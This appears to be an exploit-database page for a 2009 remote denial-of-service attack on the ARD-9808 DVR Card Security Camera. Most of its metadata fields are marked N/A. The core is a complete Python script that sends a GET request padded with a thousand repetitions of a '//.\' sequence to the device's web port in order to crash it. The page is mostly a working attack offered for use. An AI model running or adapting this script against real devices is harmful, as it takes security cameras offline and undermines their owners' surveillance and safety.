header-logo
Suggest Exploit
vendor:
ARD-9808 DVR Card Security Camera
by:
Stack
7,8
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: ARD-9808 DVR Card Security Camera
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ARD-9808 DVR Card Security Camera <= Remote Denial Of Service

This exploit sends a large number of '//.' characters to the ARD-9808 DVR Card Security Camera, causing it to crash.

Mitigation:

N/A
Source

Exploit-DB raw data:

import socket
import sys
print "----------------------------------------------------------------"
print " ARD-9808 DVR Card Security Camera <= Remote Denial Of Service  "
print " author: Stack                                                  "
print "----------------------------------------------------------------"
host = "127.0.0.1"
port = 80
try:
       buff = "//.\\" * 1000
       request =  "GET " + buff + " HTTP/1.0"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       raw_input('\n\nExploit completed. Press "Enter" to quit...')
       sys.exit
except:
       raw_input('\n\nUnable to connect. Press "Enter" to quit...')

# milw0rm.com [2009-07-01]